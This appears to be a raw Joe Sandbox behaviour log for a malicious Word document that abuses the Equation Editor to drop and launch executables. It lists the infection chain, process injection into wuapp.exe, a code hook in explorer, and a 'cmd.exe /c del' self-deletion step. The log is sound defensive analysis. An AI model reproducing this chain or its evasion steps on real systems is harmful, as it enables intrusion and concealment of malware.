          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C3659
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B5FCE
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009C07E1
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F0A64
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00401026
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E261
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041EB71
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E3DA
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041E4B4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00409E4B
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00409E50
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0041EEB5
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041D7DE
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041E79A
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009C0276
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009C1A6F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009C4CC4
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009BAC14
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009C2D97
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009C0D53
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009C3659
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009B5FCE
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009C07E1
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A0E0C6
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A3D005
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A13040
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A2905A
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A0E2E9
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00AB1238
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00AB63BF
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A0F3CF
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A363DB
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A12305
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A5A37B
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A17353
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A45485
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A21489
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A9443E
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A4D47D
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A2C5F0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A1351F
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A56540
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A14680
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A1E6C1
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_02011238
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F6E0C6
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F8905A
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F73040
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F9D005
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F963DB
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F6F3CF
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01FBA37B
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F77353
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F72305
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F6E2E9
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F8C5F0
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_02012622
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F7351F
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F81489
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01FA5485
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01FA57C3
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F7C7BC
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01FF579A
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F7E6C1
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F74680
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F869FE
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F729B2
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_02023A83
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01FF5955
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F9286D
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_0201CBA4
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F7C85C
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01FFDBDA
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_0200F8EE
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F97B00
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_0201098E
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F7CD5B
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01FA0D3B
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F9DF7C
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F80F3F
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F8EE4C
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01FA2E2F
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_0200FDDD
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AE79A
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AD7DE
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AEB71
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_00092D90
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_00099E4B
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_00099E50
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AEEB5
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_00092FB0
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: String function: 009B2233 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: String function: 00A0DF5C appears 51 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: String function: 00A53F92 appears 51 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: String function: 00A5373B appears 87 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: String function: 009AF1E0 appears 48 times
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: String function: 01FDF970 appears 81 times
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: String function: 01F6DF5C appears 107 times
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: String function: 01F6E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: String function: 01FB373B appears 238 times
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: String function: 01FB3F92 appears 108 times
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041A350 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041A400 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041A480 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041A34A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041A3FB NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041A47B NtClose,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A000C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A00078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A00048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009FFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A010D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A00060 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A001D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A0010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00A01148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F600C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F607AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F601D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F61148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F6010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F610D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F60078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F60060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F60048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F61930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F61D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F60C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F5FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AA350 NtCreateFile,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AA400 NtReadFile,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AA480 NtClose,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AA530 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AA34A NtCreateFile,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AA3FB NtReadFile,
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AA47B NtClose,
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe 78C9548A33ABD68ED553BB2A48166AFD21041B9D868A0373E4A11B93409DB049
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 77620000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exe | Memory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exe | Memory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Memory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Memory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Memory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Memory allocated: 77740000 page execute and read and write
          Source: C:\Windows\SysWOW64\wuapp.exe | Memory allocated: 77620000 page execute and read and write
          Source: C:\Windows\SysWOW64\wuapp.exe | Memory allocated: 77740000 page execute and read and write
          Source: Revised RFQ-PO180911.doc | Virustotal: Detection: 31%
          Source: Revised RFQ-PO180911.doc | ReversingLabs: Detection: 32%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exe | Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
          Source: C:\Windows\SysWOW64\wuapp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exe | Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Windows\SysWOW64\wuapp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
          Source: C:\Users\user\AppData\Roaming\word.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$vised RFQ-PO180911.doc
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR6029.tmp
          Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@11/14@5/3
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00402078 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: .VBPud<_
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr | OLE document summary: title field not present or empty
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr | OLE document summary: author field not present or empty
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr | OLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\krajo\ynpcjm\ntdn\3216792803f64d1292a50b8c7f0c4afc\ibwuyp\qahbtotu\Release\qahbtotu.pdb source: word.exe, 00000004.00000002.945823698.0000000002800000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp, dvukljmnr.exe, 00000005.00000000.914293624.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1182845110.000000000244F000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182267839.00000000002C2000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe.4.dr, nstBFBE.tmp.4.dr
          Source: Binary string: wntdll.pdb source: dvukljmnr.exe, dvukljmnr.exe, 00000006.00000003.923098867.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984351623.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000003.925762664.0000000000740000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000002.1182604769.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.985104310.00000000009A0000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.983888458.0000000000840000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuapp.pdb source: dvukljmnr.exe, 00000006.00000002.984008037.0000000000504000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.983799814.0000000000030000.00000040.10000000.00040000.00000000.sdmp
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_009061EC push FFFFFFF0h; ret
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_00906330 push FFFFFFF0h; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 5_2_009AF225 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041E9E6 push edx; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_00416B6D push ebx; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041D4F2 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041D4FB push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041D4A5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041D55C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_0041EEB5 push esi; ret
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Code function: 6_2_009AF225 push ecx; ret
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01F6DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AD4A5 push eax; ret
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AD4FB push eax; ret
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AD4F2 push eax; ret
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AD55C push eax; ret
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AE9E6 push edx; ret
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000A6B6D push ebx; ret
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_000AEEB5 push esi; ret
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Roaming\word.exe | File created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
